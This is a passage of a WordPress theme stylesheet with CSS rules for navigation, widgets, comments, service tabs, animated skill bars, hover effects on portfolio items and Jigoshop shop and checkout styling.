background-color 1s ease; transition: background-color 1s ease; } .comment-navigation .nav-previous a:hover, .paging-navigation .nav-previous a:hover, .post-navigation .nav-previous a:hover, .comment-navigation .nav-next a:hover, .paging-navigation .nav-next a:hover, .post-navigation .nav-next a:hover, .page-links a:hover, .more-link:hover { background-color: #34495E; color: #FFFFFF; } .site-main .comment-navigation, .site-main .paging-navigation, .site-main .post-navigation { margin: 0 0 1.5em; overflow: hidden; } .comment-navigation .nav-previous, .paging-navigation .nav-previous, .post-navigation .nav-previous { float: left; width: 50%; } .comment-navigation .nav-previous .meta-nav, .paging-navigation .nav-previous .meta-nav, .post-navigation .nav-previous .meta-nav { padding: 6px 10px; } .comment-navigation .nav-next, .paging-navigation .nav-next, .post-navigation .nav-next { float: right; text-align: right; width: 50%; } .comment-navigation .nav-next .meta-nav, .paging-navigation .nav-next .meta-nav, .post-navigation .nav-next .meta-nav { padding: 6px 10px; } /*-------------------------------------------------------------- 6.0 Accessibility --------------------------------------------------------------*/ /* Text meant only for screen readers */ .screen-reader-text { clip: rect(1px, 1px, 1px, 1px); position: absolute !important; height: 1px; width: 1px; overflow: hidden; } .screen-reader-text:hover, .screen-reader-text:active, .screen-reader-text:focus { background-color: #FFFFFF; background-clip: padding-box; /* stops bg color from leaking outside the border: */ -webkit-border-radius: 3px; border-radius: 3px; box-shadow: 0 0 2px 2px rgba(0, 0, 0, 0.6); clip: auto !important; color: #6D6D6D; display: block; font-size: 14px; font-size: 1.4rem; font-weight: bold; height: auto; left: 5px; line-height: normal; padding: 15px 23px 14px; text-decoration: none; top: 5px; width: auto; z-index: 100000; /* Above WP toolbar */ } /*-------------------------------------------------------------- 7.0 Alignments --------------------------------------------------------------*/ .alignleft { display: inline; float: left; margin-right: 1.5em; } .alignright { display: inline; float: right; margin-left: 1.5em; } .aligncenter { display: block; margin: 0 auto; } /*-------------------------------------------------------------- 8.0 Clearings --------------------------------------------------------------*/ .clear:before, .clear:after, .entry-content:before, .entry-content:after, .comment-content:before, .comment-content:after, .site-header:before, .site-header:after, .site-content:before, .site-content:after, .site-footer:before, .site-footer:after { content: ""; display: table; } .clear:after, .entry-content:after, .comment-content:after, .site-header:after, .site-content:after, .site-footer:after { clear: both; } /*-------------------------------------------------------------- 9.0 Widgets --------------------------------------------------------------*/ .widget-title { color: #3498db; } .widget { margin: 0 0 1.5em; /* Make sure select elements fit in widgets */ } .widget h3 { margin-bottom: .5em; } .widget select { max-width: 100%; width: 100%; } .widget ul { margin: 0; list-style: none; } .widget ul li { border-bottom: 1px solid #ECF0F1; color: #797979; } .widget ul li a { padding-left: 15px; background: url("images/list.png") no-repeat left 8px; -webkit-transition: all 0.5s; -moz-transition: all 0.5s; -o-transition: all 0.5s; -ms-transition: all 0.5s; transition: all 0.5s; } .widget ul li a:hover { background-position: 5px 8px; } .widget ul li li { padding-left: 20px; } .widget a { color: #34495E; } .widget a:hover { color: #3498db; } .widget_recent_comments ul li a, .widget_rss ul li a { padding: 0; background: none; } .widget_rss ul li { padding: 8px 0; } .widget_rss ul li .rss-date { color: #3498db; display: block; } .widget_rss ul li cite { color: #797979; } /* Search widget */ .widget_search .search-submit { display: none; } .widget_search input { width: 100%; padding: 5px 10px; } .widget_archive li, .widget_categories li, .widget_pages li, .widget_meta li, .widget_recent_comments li, .widget_recent_entries li, .widget_nav_menu li { padding: 10px 0; } .widget li ul { border-top: 1px solid #ECF0F1; margin-top: 10px; } .widget_tag_cloud a { background-color: #ECF0F1; padding: 5px; margin: 2px; display: inline-block; } .widget_tag_cloud a:hover { color: #FFFFFF; background-color: #3498db; } /*-------------------------------------------------------------- 10.0 Content --------------------------------------------------------------*/ .site-branding { height: 106px; padding: 20px 0 0; } .site-title { line-height: 1; } .site-title a { color: #34495E; } .site-title a:hover { color: #3498db; } .site-description { font-size: 18px; font-size: 1.8rem; color: #6D6D6D; } #site-navigation { background-color: #34495E; height: 57px; } .site-footer { background-color: #34495E; } .site-footer a { color: #FFFFFF; } .site-footer a:hover { color: #3498db; } .site-footer .widget li a { color: #FFFFFF; background: url("images/list-white.png") no-repeat left 10px; display: block; } .site-footer .widget li a:hover { color: #3498db; background-position: 5px 10px; } .site-footer .widget_tag_cloud a { background-color: #7F8C8D; } .site-footer .widget_tag_cloud a:hover { color: #FFFFFF; background-color: #3498db; } #colophon { color: #FFFFFF; } .site-info { padding: 20px 0; } .footer-top { border-bottom: 1px solid #263340; padding: 20px 0 0; } .footer-bottom { border-top: 1px solid #4d647b; } .footer-bottom a { color: #3498db; } .footer-bottom a:hover { color: #FFFFFF; } #content { padding-top: 20px; } /*-------------------------------------------------------------- 10.1 Posts and pages --------------------------------------------------------------*/ .sticky { display: block; background-color: #F5F5F5; padding: 10px; border: 1px solid #d6e6ea; background-clip: padding-box; /* stops bg color from leaking outside the border: */ -webkit-border-radius: 8px; border-radius: 8px; } .hentry { margin: 0 0 1.5em; } .entry-meta, .entry-footer { border-top: 1px solid #d6e6ea; border-bottom: 1px solid #d6e6ea; padding: 8px 0; color: #7F8C8D; margin-top: 10px; } .entry-meta span, .entry-footer span { padding-right: 25px; } .entry-meta span span, .entry-footer span span { padding-right: 0; } .entry-meta span i, .entry-footer span i { padding-right: 5px; } .entry-meta a, .entry-footer a { color: #7F8C8D; } .entry-meta a:hover, .entry-footer a:hover { color: #34495E; } .updated:not(.published) { display: none; } .single .byline, .group-blog .byline { display: inline; } .page-content, .entry-content, .entry-summary { margin: 1.5em 0 0; } .page-links { clear: both; margin: 0 0 1.5em; } blockquote { position: relative; margin-bottom: 1.5em; } blockquote:before { position: absolute; content: "\f10d"; color: #3498db; font-size: 1.4em; font-family: 'FontAwesome'; } blockquote p { width: 95%; margin: 0 0 0 35px; } /*-------------------------------------------------------------- 10.2 Asides --------------------------------------------------------------*/ .blog .format-aside .entry-title, .archive .format-aside .entry-title { display: none; } /*-------------------------------------------------------------- 10.3 Comments --------------------------------------------------------------*/ .comment-content a { word-wrap: break-word; } .bypostauthor { display: block; } h2.comments-title { margin-bottom: 30px; padding-bottom: 10px; line-height: normal; } ol.comment-list { margin: 0 0 1.5em 0; list-style-type: none; } ol.comment-list li.pingback { border: 1px solid #F5F5F5; margin: 5px; padding: 10px; } ol.comment-list .bypostauthor { display: block; } ol.comment-list ol.children { list-style-type: none; } ol.comment-list .comment-body { border: 2px solid #F0F2F3; left: 60px; padding: 5px 20px 10px; position: relative; width: 92%; } ol.comment-list .comment-body p { margin-bottom: 10px; } ol.comment-list .comment-author img { top: 0; left: -60px; position: absolute; } ol.comment-list .parent article { border: 2px solid #F0F2F3; margin-bottom: 20px; padding: 5px 20px 10px; } ol.comment-list .comment-metadata { display: block; font-size: 13px; font-size: 1.3rem; margin-bottom: 20px; } ol.comment-list .comment-metadata a { color: #797979; } ol.comment-list .comment-metadata a:hover { color: #3498db; } ol.comment-list .comment-author cite { font-style: normal; } ol.comment-list .comment-author cite a { font-size: 17px; font-size: 1.7rem; color: #34495E; } ol.comment-list .comment-author cite a:hover { color: #3498db; } ol.comment-list .comment-content li { list-style-type: unset; overflow: visible; } ol.comment-list > li { margin-bottom: 20px; } ol.comment-list .even.depth-1 .comment-body { background-color: #F0F2F3; } ol.comment-list .odd.depth-1 .comment-body { background-color: #fff; } ol.comment-list .even.depth-2 .comment-body { background-color: #F0F2F3; } ol.comment-list .odd.depth-3 .comment-body { background-color: #fff; } ol.comment-list .even.depth-4 .comment-body { background-color: #F0F2F3; } ol.comment-list .odd.depth-5 .comment-body { background-color: #fff; } ol.comment-list .bypostauthor > .comment-body { background-color: #d6e6ea !important; } ol.comment-list li.pingback .comment-body { border: 0; padding: 0; position: static; width: 100%; background-color: transparent !important; } .comment-form label { min-width: 80px; display: inline-block; } .comment-form input[type="text"], .comment-form input[type="email"], .comment-form input[type="url"], .comment-form textarea { padding: 5px 10px; } .comment-form textarea { margin-top: 10px; } .services { padding-top: 50px; } h2.service-title, h3.service-subtitle { text-align: center; } h2.service-title { font-size: 2.8em; display: block; text-align: center; margin-bottom: 30px; } h2.service-title div { display: inline; padding-bottom: 10px; margin-bottom: 30px; background-image: url("images/bg-line-title.gif"), url("images/bg-line-title.gif"), url("images/bgrepeat-line-title.gif"); background-position: left bottom, right bottom, center bottom; background-repeat: no-repeat, no-repeat, repeat-x; } h3.service-subtitle { margin-bottom: 30px; } #service-tabs ul { text-align: center; margin: 0 0 50px; list-style-type: none; } .ui-tabs-nav li { display: inline; } #service-tabs ul li a { padding: 12px 30px; display: inline-block; color: #FFFFFF; } .ui-tabs-panel { clear: both; } .tab-icon { text-align: center; } .tab-icon i { font-size: 8em; /*padding: 25px;*/ border-radius: 25px 0 25px 0; } #service-tabs .ui-tabs-panel { min-height: 250px; position: relative; } #service-tabs .ui-tabs-panel .tab-icon { /* min-height: 140px; position: absolute; top: 50%; -webkit-transform: translateY(-50%); -moz-transform: translateY(-50%); transform: translateY(-50%); width: 22%; */ text-align: center; padding: 50px 0; background-color: #F0F2F3; } .team-col { min-height: 170px; } .team-col:nth-of-type(2), .team-col:nth-of-type(4) { border-right: 0; } .team-col:nth-of-type(3), .team-col:nth-of-type(4) { border-bottom: 0; } #service-tabs .service-desc li { float: none; list-style-type: disc; } #service-tabs .service-desc ol { list-style-type: disc; } #service-tabs .service-desc ul { text-align: left; margin-left: 30px; list-style-type: disc; } .team-col strong { display: block; font-size: 1.4em; } .team-col h5 { font-size: 1em; font-weight: normal; } .team-col img { float: left; margin-right: 15px; margin-bottom: 15px; } .team-col p { text-align: justify; } .team-col p, .team-col h5 { margin-left: 135px; } .team-content { background-image: url("images/circle.gif"), url("images/circle.gif"), url("images/circle.gif"), url("images/line-repeat.gif"); background-position: 51% top, 51% bottom, 51% center, 51% top; background-repeat: no-repeat, no-repeat, no-repeat, repeat-y; margin-bottom: 50px; } .team-col { padding: 25px; } .innercol { background-image: url("images/circle.gif"), url("images/circle.gif"), url("images/circle.gif"), url("images/line-repeat.gif"); background-position: left center, right center, 51% center, center center; background-repeat: no-repeat, no-repeat, no-repeat, repeat-x; } #add-info h1, #add-info h2, #add-info h3, #add-info h4, #add-info h5 { clear: none; } #add-info h2 { text-align: center; margin-bottom: 35px; } #add-info img { margin-right: 75px; } .recent-work { margin: 10px; height: 250px; overflow: hidden; position: relative; width: 250px; float: left; } .recent-work:hover .rk-thumb { opacity: .5; transition: all .5s; } .rk-content { position: absolute; top: 0; left: 0; padding: 15px; opacity: 0; -webkit-transition: all .5s; -moz-transition: all .5s; transition: all .5s; width: 100%; min-height: 250px; line-height: 1.2; } .recent-work:hover .rk-content { opacity: 1; } .rk-content p { text-align: justify; } .rk-content h3 { padding-bottom: 10px; } .rk-content h3 a { color: #3498db; } .rk-content h3 a:hover { color: #FFFFFF; } .rk-content p.readmore { text-align: center; } .rk-content p.readmore a { background-color: #34495E; } .rk-content p.readmore a:hover { color: #FFFFFF; background-color: #3498db; } .rk-content { background-color: rgba(51, 73, 94, 0.8); color: #FFFFFF; } /* Recent Work Animation */ .rk-thumb { overflow: hidden; } .rk-thumb img { -webkit-transition: all 0.2s linear; -moz-transition: all 0.2s linear; -o-transition: all 0.2s linear; -ms-transition: all 0.2s linear; transition: all 0.2s linear; } .rk-content { -ms-filter: "progid: DXImageTransform.Microsoft.Alpha(Opacity=0)"; filter: alpha(opacity=0); opacity: 0; -webkit-transition: all 0.4s ease-in-out; -moz-transition: all 0.4s ease-in-out; -o-transition: all 0.4s ease-in-out; -ms-transition: all 0.4s ease-in-out; transition: all 0.4s ease-in-out; } .rk-content h3 { -webkit-transform: translateY(-100px); -moz-transform: translateY(-100px); -o-transform: translateY(-100px); -ms-transform: translateY(-100px); transform: translateY(-100px); -ms-filter: "progid: DXImageTransform.Microsoft.Alpha(Opacity=0)"; filter: alpha(opacity=0); opacity: 0; -webkit-transition: all 0.2s ease-in-out; -moz-transition: all 0.2s ease-in-out; -o-transition: all 0.2s ease-in-out; -ms-transition: all 0.2s ease-in-out; transition: all 0.2s ease-in-out; } .rk-content p { -webkit-transform: translateY(100px); -moz-transform: translateY(100px); -o-transform: translateY(100px); -ms-transform: translateY(100px); transform: translateY(100px); -ms-filter: "progid: DXImageTransform.Microsoft.Alpha(Opacity=0)"; filter: alpha(opacity=0); opacity: 0; -webkit-transition: all 0.2s linear; -moz-transition: all 0.2s linear; -o-transition: all 0.2s linear; -ms-transition: all 0.2s linear; transition: all 0.2s linear; } .recent-work:hover img { -webkit-transform: scale(1.1, 1.1); -moz-transform: scale(1.1, 1.1); -o-transform: scale(1.1, 1.1); -ms-transform: scale(1.1, 1.1); transform: scale(1.1, 1.1); } .view-first a.info { -ms-filter: "progid: DXImageTransform.Microsoft.Alpha(Opacity=0)"; filter: alpha(opacity=0); opacity: 0; -webkit-transition: all 0.2s ease-in-out; -moz-transition: all 0.2s ease-in-out; -o-transition: all 0.2s ease-in-out; -ms-transition: all 0.2s ease-in-out; transition: all 0.2s ease-in-out; } .recent-work:hover .rk-content { -ms-filter: "progid: DXImageTransform.Microsoft.Alpha(Opacity=100)"; filter: alpha(opacity=100); opacity: 1; } .recent-work:hover h3, .recent-work:hover p, .recent-work:hover a.info { -ms-filter: "progid: DXImageTransform.Microsoft.Alpha(Opacity=100)"; filter: alpha(opacity=100); opacity: 1; -webkit-transform: translateY(0px); -moz-transform: translateY(0px); -o-transform: translateY(0px); -ms-transform: translateY(0px); transform: translateY(0px); } .recent-work:hover p { -webkit-transition-delay: 0.1s; -moz-transition-delay: 0.1s; -o-transition-delay: 0.1s; -ms-transition-delay: 0.1s; transition-delay: 0.1s; } .recent-work:hover a.info { -webkit-transition-delay: 0.2s; -moz-transition-delay: 0.2s; -o-transition-delay: 0.2s; -ms-transition-delay: 0.2s; transition-delay: 0.2s; } .team-col h5 { color: #3498db; } #service-tabs ul li a { background-color: #34495E; } #service-tabs ul li a:hover, #service-tabs ul li.ui-tabs-active a { background-color: #3498db; } .flex-direction-nav a:hover { background: #3498db; } .flex-caption { position: absolute; color: #FFFFFF; top: 10%; left: 0; width: 100%; text-align: center; } .flex-caption h1, .flex-caption h2, .flex-caption h3, .flex-caption h4, .flex-caption h5, .flex-caption h6, .flex-caption p, .flex-caption ul { margin: 0 0 .5em; padding: 0 30px; } .flex-caption h2, .flex-caption h3 { text-shadow: 1px 1px 1px #000; } .flexslider .slides > li { position: relative; } /* Skill Styls Starts -------------------------------------- */ .skill-container { margin-top: 20px; padding-bottom: 1px; } .skill { height: 12px; position: relative; margin: -8px 0 10px 50px; background-color: #F0F2F3; } .skill-percentage { height: 12px; position: absolute; background-color: #3498db; } .skill-container i { color: #FFFFFF; } .skill-container [class*="fa fa-"]:before { background: #34495E; color: #FFFFFF; } .circle { top: -3px; width: 17px; right: -3px; height: 17px; position: absolute; display: none; } .skill-content { top: -26px; position: relative; } .skill-content span { float: right; } .skill-container [class*="fa fa-"]:before { -webkit-border-radius: 30px; -moz-border-radius: 30px; border-radius: 30px; padding: 8px; } .percent5 { width: 5%; } .percent10 { width: 10%; } .percent15 { width: 15%; } .percent20 { width: 20%; } .percent25 { width: 25%; } .percent30 { width: 30%; } .percent35 { width: 35%; } .percent40 { width: 40%; } .percent45 { width: 45%; } .percent50 { width: 50%; } .percent55 { width: 55%; } .percent60 { width: 60%; } .percent65 { width: 65%; } .percent70 { width: 70%; } .percent75 { width: 75%; } .percent80 { width: 80%; } .percent85 { width: 85%; } .percent90 { width: 90%; } .percent95 { width: 95%; } .percent100 { width: 100%; } .percent5.start { width: 0%; -webkit-animation: percent5 2s ease-out forwards; -moz-animation: percent5 2s ease-out forwards; -ms-animation: percent5 2s ease-out forwards; -o-animation: percent5 2s ease-out forwards; animation: percent5 2s ease-out forwards; } .percent10.start { width: 0%; -webkit-animation: percent10 2s ease-out forwards; -moz-animation: percent10 2s ease-out forwards; -ms-animation: percent10 2s ease-out forwards; -o-animation: percent10 2s ease-out forwards; animation: percent10 2s ease-out forwards; } .percent15.start { width: 0%; -webkit-animation: percent15 2s ease-out forwards; -moz-animation: percent15 2s ease-out forwards; -ms-animation: percent15 2s ease-out forwards; -o-animation: percent15 2s ease-out forwards; animation: percent15 2s ease-out forwards; } .percent20.start { width: 0%; -webkit-animation: percent20 2s ease-out forwards; -moz-animation: percent20 2s ease-out forwards; -ms-animation: percent20 2s ease-out forwards; -o-animation: percent20 2s ease-out forwards; animation: percent20 2s ease-out forwards; } .percent25.start { width: 0%; -webkit-animation: percent25 2s ease-out forwards; -moz-animation: percent25 2s ease-out forwards; -ms-animation: percent25 2s ease-out forwards; -o-animation: percent25 2s ease-out forwards; animation: percent25 2s ease-out forwards; } .percent30.start { width: 0%; -webkit-animation: percent30 2s ease-out forwards; -moz-animation: percent30 2s ease-out forwards; -ms-animation: percent30 2s ease-out forwards; -o-animation: percent30 2s ease-out forwards; animation: percent30 2s ease-out forwards; } .percent35.start { width: 0%; -webkit-animation: percent35 2s ease-out forwards; -moz-animation: percent35 2s ease-out forwards; -ms-animation: percent35 2s ease-out forwards; -o-animation: percent35 2s ease-out forwards; animation: percent35 2s ease-out forwards; } .percent40.start { width: 0%; -webkit-animation: percent40 2s ease-out forwards; -moz-animation: percent40 2s ease-out forwards; -ms-animation: percent40 2s ease-out forwards; -o-animation: percent40 2s ease-out forwards; animation: percent40 2s ease-out forwards; } .percent45.start { width: 0%; -webkit-animation: percent45 2s ease-out forwards; -moz-animation: percent45 2s ease-out forwards; -ms-animation: percent45 2s ease-out forwards; -o-animation: percent45 2s ease-out forwards; animation: percent45 2s ease-out forwards; } .percent50.start { width: 0%; -webkit-animation: percent50 2s ease-out forwards; -moz-animation: percent50 2s ease-out forwards; -ms-animation: percent50 2s ease-out forwards; -o-animation: percent50 2s ease-out forwards; animation: percent50 2s ease-out forwards; } .percent55.start { width: 0%; -webkit-animation: percent55 2s ease-out forwards; -moz-animation: percent55 2s ease-out forwards; -ms-animation: percent55 2s ease-out forwards; -o-animation: percent55 2s ease-out forwards; animation: percent55 2s ease-out forwards; } .percent60.start { width: 0%; -webkit-animation: percent60 2s ease-out forwards; -moz-animation: percent60 2s ease-out forwards; -ms-animation: percent60 2s ease-out forwards; -o-animation: percent60 2s ease-out forwards; animation: percent60 2s ease-out forwards; } .percent65.start { width: 0%; -webkit-animation: percent65 2s ease-out forwards; -moz-animation: percent65 2s ease-out forwards; -ms-animation: percent65 2s ease-out forwards; -o-animation: percent65 2s ease-out forwards; animation: percent65 2s ease-out forwards; } .percent70.start { width: 0%; -webkit-animation: percent70 2s ease-out forwards; -moz-animation: percent70 2s ease-out forwards; -ms-animation: percent70 2s ease-out forwards; -o-animation: percent70 2s ease-out forwards; animation: percent70 2s ease-out forwards; } .percent75.start { width: 0%; -webkit-animation: percent75 2s ease-out forwards; -moz-animation: percent75 2s ease-out forwards; -ms-animation: percent75 2s ease-out forwards; -o-animation: percent75 2s ease-out forwards; animation: percent75 2s ease-out forwards; } .percent80.start { width: 0%; -webkit-animation: percent80 2s ease-out forwards; -moz-animation: percent80 2s ease-out forwards; -ms-animation: percent80 2s ease-out forwards; -o-animation: percent80 2s ease-out forwards; animation: percent80 2s ease-out forwards; } .percent85.start { width: 0%; -webkit-animation: percent85 2s ease-out forwards; -moz-animation: percent85 2s ease-out forwards; -ms-animation: percent85 2s ease-out forwards; -o-animation: percent85 2s ease-out forwards; animation: percent85 2s ease-out forwards; } .percent90.start { width: 0%; -webkit-animation: percent90 2s ease-out forwards; -moz-animation: percent90 2s ease-out forwards; -ms-animation: percent90 2s ease-out forwards; -o-animation: percent90 2s ease-out forwards; animation: percent90 2s ease-out forwards; } .percent95.start { width: 0%; -webkit-animation: percent95 2s ease-out forwards; -moz-animation: percent95 2s ease-out forwards; -ms-animation: percent95 2s ease-out forwards; -o-animation: percent95 2s ease-out forwards; animation: percent95 2s ease-out forwards; } .percent100 { width: 0%; -webkit-animation: percent100 2s ease-out forwards; -moz-animation: percent100 2s ease-out forwards; -ms-animation: percent100 2s ease-out forwards; -o-animation: percent100 2s ease-out forwards; animation: percent100 2s ease-out forwards; } @-moz-keyframes percent5 { 0% { width: 0px; } 100% { width: 5%; } } @-moz-keyframes percent10 { 0% { width: 0px; } 100% { width: 10%; } } @-moz-keyframes percent15 { 0% { width: 0px; } 100% { width: 15%; } } @-moz-keyframes percent20 { 0% { width: 0px; } 100% { width: 20%; } } @-moz-keyframes percent25 { 0% { width: 0px; } 100% { width: 25%; } } @-moz-keyframes percent30 { 0% { width: 0px; } 100% { width: 30%; } } @-moz-keyframes percent35 { 0% { width: 0px; } 100% { width: 35%; } } @-moz-keyframes percent40 { 0% { width: 0px; } 100% { width: 40%; } } @-moz-keyframes percent45 { 0% { width: 0px; } 100% { width: 45%; } } @-moz-keyframes percent50 { 0% { width: 0px; } 100% { width: 50%; } } @-moz-keyframes percent55 { 0% { width: 0px; } 100% { width: 55%; } } @-moz-keyframes percent60 { 0% { width: 0px; } 100% { width: 60%; } } @-moz-keyframes percent65 { 0% { width: 0px; } 100% { width: 65%; } } @-moz-keyframes percent70 { 0% { width: 0px; } 100% { width: 70%; } } @-moz-keyframes percent75 { 0% { width: 0px; } 100% { width: 75%; } } @-moz-keyframes percent80 { 0% { width: 0px; } 100% { width: 80%; } } @-moz-keyframes percent85 { 0% { width: 0px; } 100% { width: 85%; } } @-moz-keyframes percent90 { 0% { width: 0px; } 100% { width: 90%; } } @-moz-keyframes percent95 { 0% { width: 0px; } 100% { width: 95%; } } @-moz-keyframes percent100 { 0% { width: 0px; } 100% { width: 100%; } } @-webkit-keyframes percent5 { 0% { width: 0px; } 100% { width: 5%; } } @-webkit-keyframes percent10 { 0% { width: 0px; } 100% { width: 10%; } } @-webkit-keyframes percent15 { 0% { width: 0px; } 100% { width: 15%; } } @-webkit-keyframes percent20 { 0% { width: 0px; } 100% { width: 20%; } } @-webkit-keyframes percent25 { 0% { width: 0px; } 100% { width: 25%; } } @-webkit-keyframes percent30 { 0% { width: 0px; } 100% { width: 30%; } } @-webkit-keyframes percent35 { 0% { width: 0px; } 100% { width: 35%; } } @-webkit-keyframes percent40 { 0% { width: 0px; } 100% { width: 40%; } } @-webkit-keyframes percent45 { 0% { width: 0px; } 100% { width: 45%; } } @-webkit-keyframes percent50 { 0% { width: 0px; } 100% { width: 50%; } } @-webkit-keyframes percent55 { 0% { width: 0px; } 100% { width: 55%; } } @-webkit-keyframes percent60 { 0% { width: 0px; } 100% { width: 60%; } } @-webkit-keyframes percent65 { 0% { width: 0px; } 100% { width: 65%; } } @-webkit-keyframes percent70 { 0% { width: 0px; } 100% { width: 70%; } } @-webkit-keyframes percent75 { 0% { width: 0px; } 100% { width: 75%; } } @-webkit-keyframes percent80 { 0% { width: 0px; } 100% { width: 80%; } } @-webkit-keyframes percent85 { 0% { width: 0px; } 100% { width: 85%; } } @-webkit-keyframes percent90 { 0% { width: 0px; } 100% { width: 90%; } } @-webkit-keyframes percent95 { 0% { width: 0px; } 100% { width: 95%; } } @-webkit-keyframes percent100 { 0% { width: 0px; } 100% { width: 100%; } } /* Skill Styls Ends -------------------------------------- */ .flexslider .slides img { width: 100%; height: 100%; } p.readmore a, p.btn-slider a, p.btn-more a { display: inline-block; padding: 5px 15px; } p.btn-slider a { padding: 7px 20px; padding-left: 15px; } p.btn-slider a i { padding-right: 8px; } p.btn-slider a, p.btn-more a { background-color: #34495E; color: #FFFFFF; } p.btn-slider a:hover, p.btn-more a:hover { background-color: #3498db; } #service-tabs ul li a { background-color: #34495E; } #service-tabs ul li a:hover, #service-tabs ul li.ui-tabs-active a { background-color: #3498db; } .flex-direction-nav a:hover { background: #3498db; color: #FFFFFF; } .flex-control-paging li a { border-color: #3498db !important; background-color: #FFFFFF; } .flex-control-paging li a.flex-active, .flex-control-paging li a:hover { background-color: #3498db !important; } .jigoshop #breadcrumb a { color: #3498db !important; text-decoration: underline; } .jigoshop #breadcrumb a:hover { text-decoration: none; } .jigoshop .site-content { width: 1170px; } .jigoshop .products li { width: 32%; min-height: 150px; margin-bottom: 65px; padding: 20px 0 !important; } .jigoshop .products li a.button { position: absolute; right: 10px; bottom: 20px; margin: 0; } .jigoshop .products li a:hover img { border: 0; } .jigoshop .products li strong { padding: 0 10px; min-height: 50px; text-align: center; line-height: normal; } .jigoshop .products li strong:hover { color: #3498db; } a.button, button.button, input.button, #review_form #submit { background-color: #3498db; background-clip: padding-box; /* stops bg color from leaking outside the border: */ -webkit-border-radius: 0; border-radius: 0; } a.button:hover, button.button:hover, input.button:hover, #review_form #submit:hover { background-color: #34495E; color: #FFFFFF; } .products li .price, div.product p.price, p.stock { color: #ff4200; } .products li .price .from, .products li .price del { font-size: 12px; } span.onsale { margin: 0 !important; background-clip: padding-box; /* stops bg color from leaking outside the border: */ -webkit-border-radius: 0; border-radius: 0; background-color: #DA54C8; padding: 10px 20px; left: 0; right: auto; } .button-alt { margin-top: 0; padding: 7px; background: #34495e; /* Old browsers */ background: -moz-linear-gradient(top, #34495e 0%, #273347 100%); /* FF3.6+ */ background: -webkit-gradient(linear, left top, left bottom, color-stop(0%, #34495e), color-stop(100%, #273347)); /* Chrome,Safari4+ */ background: -webkit-linear-gradient(top, #34495e 0%, #273347 100%); /* Chrome10+,Safari5.1+ */ background: -o-linear-gradient(top, #34495e 0%, #273347 100%); /* Opera 11.10+ */ background: -ms-linear-gradient(top, #34495e 0%, #273347 100%); /* IE10+ */ background: linear-gradient(to bottom, #34495e 0%, #273347 100%); /* W3C */ filter: progid:DXImageTransform.Microsoft.gradient( startColorstr='#34495e', endColorstr='#273347',GradientType=0 ); /* IE6-9 */ border: 1px solid #34495E; -webkit-box-shadow: inset 0 -1px 0 rgba(0, 0, 0, 0.075), inset 0 1px 0 rgba(255, 255, 255, 0.3), 0 1px 2px rgba(0, 0, 0, 0.1); -moz-box-shadow: inset 0 -1px 0 rgba(0, 0, 0, 0.075), inset 0 1px 0 rgba(255, 255, 255, 0.3), 0 1px 2px rgba(0, 0, 0, 0.1); box-shadow: inset 0 -1px 0 rgba(0, 0, 0, 0.075), inset 0 1px 0 rgba(255, 255, 255, 0.3), 0 1px 2px rgba(0, 0, 0, 0.1); } a.button-alt { color: #FFFFFF; } .button-alt:hover { background: #3498db; /* Old browsers */ background: -moz-linear-gradient(top, #3498db 0%, #3498db 100%); /* FF3.6+ */ background: -webkit-gradient(linear, left top, left bottom, color-stop(0%, #3498db), color-stop(100%, #3498db)); /* Chrome,Safari4+ */ background: -webkit-linear-gradient(top, #3498db 0%, #3498db 100%); /* Chrome10+,Safari5.1+ */ background: -o-linear-gradient(top, #3498db 0%, #3498db 100%); /* Opera 11.10+ */ background: -ms-linear-gradient(top, #3498db 0%, #3498db 100%); /* IE10+ */ background: linear-gradient(to bottom, #3498db 0%, #3498db 100%); /* W3C */ filter: progid:DXImageTransform.Microsoft.gradient( startColorstr='#3498db', endColorstr='#3498db',GradientType=0 ); /* IE6-9 */ border-color: #136CAB; } .jigoshop .site-content .quantity input.plus, .jigoshop .site-content .quantity input.minus { background-color: #34495E; } .jigoshop .site-content .quantity input.plus:hover, .jigoshop .site-content .quantity input.minus:hover { background-color: #3498db; } .related ul.products { float: none; width: 100%; } div.product div.summary, div.product div.images { width: 48%; } .single-product div.product div.images img { width: 100%; border-color: #d6e6ea; background-color: #FFFFFF; } div.product #tabs ul.tabs { background-color: #D7D7D7; } div.product #tabs .panel { border-color: #D7D7D7; } div.product #tabs ul.tabs a { background-color: #F0F2F3; } .products li span.price { float: none; text-align: left; padding-left: 10px; } ins { background-color: #34495E; color: #FFFFFF; padding: 0 5px; } .product-remove a.remove { background-color: #fa0000; margin: 0 auto; } .product-remove a.remove:hover { background-color: #34495E; } .product-name a:hover { color: #34495E; } table.shop_table th { color: #34495E; font-size: 14px; } .quantity input.qty { text-align: center; } .shop_table.cart .actions a.checkout-button:hover { color: #FFFFFF; } .cart-collaterals .cart_totals, .cart-collaterals .shipping_calculator { width: 48%; } form .form-row input.input-text:focus, #content .form-row input.input-text:focus, form .form-row textarea:focus, #content .form-row textarea:focus { box-shadow: inset 0 0 0 1px #3498db; -webkit-box-shadow: inset 0 0 0 1px #3498db; -moz-box-shadow: inset 0 0 0 1px #3498db; } #payment div.payment_box { background: #88bfe8; /* Old browsers */ background: -moz-linear-gradient(top, #88bfe8 0%, #70b0e0 100%); /* FF3.6+ */ background: -webkit-gradient(linear, left top, left bottom, color-stop(0%, #88bfe8), color-stop(100%, #70b0e0)); /* Chrome,Safari4+ */ background: -webkit-linear-gradient(top, #88bfe8 0%, #70b0e0 100%); /* Chrome10+,Safari5.1+ */ background: -o-linear-gradient(top, #88bfe8 0%, #70b0e0 100%); /* Opera 11.10+ */ background: -ms-linear-gradient(top, #88bfe8 0%, #70b0e0 100%); /* IE10+ */ background: linear-gradient(to bottom, #88bfe8 0%, #70b0e0 100%); /* W3C */ filter: progid:DXImageTransform.Microsoft.gradient( startColorstr='#88bfe8', endColorstr='#70b0e0',GradientType=0 ); /* IE6-9 */ border-color: #3498db; } #payment div.payment_box p { color: #FFFFFF; } #payment div.payment_box:after { border-bottom-color: #3498db; } .form-row .required { color: #f94242; } form .form-row input.input-text, #content .form-row input.input-text, form .form-row textarea, #content .form-row textarea { line-height: normal; } #payment .payment_methods.methods li input#payment_method_cheque, #payment .payment_methods.methods li label { display: inline; } td.cart-row-subtotal, td.cart-row-total { color: #3498db; } .checkout .jigoshop-invalid input.input-text, .checkout .jigoshop-validated select { border-color: #3498db !important; } .jigoshop .site-content div.jigoshop_error, .jigoshop .site-content div.jigoshop_message { position: relative; text-shadow: 0 1px 0 #fff; list-style: none outside !important; *zoom: 1; width: auto; -webkit-box-shadow: inset 0 -2px 6px rgba(0, 0, 0, 0.05), inset 0 -2px 30px rgba(0, 0, 0, 0.015), inset 0 1px 0 #fff, 0 1px 2px 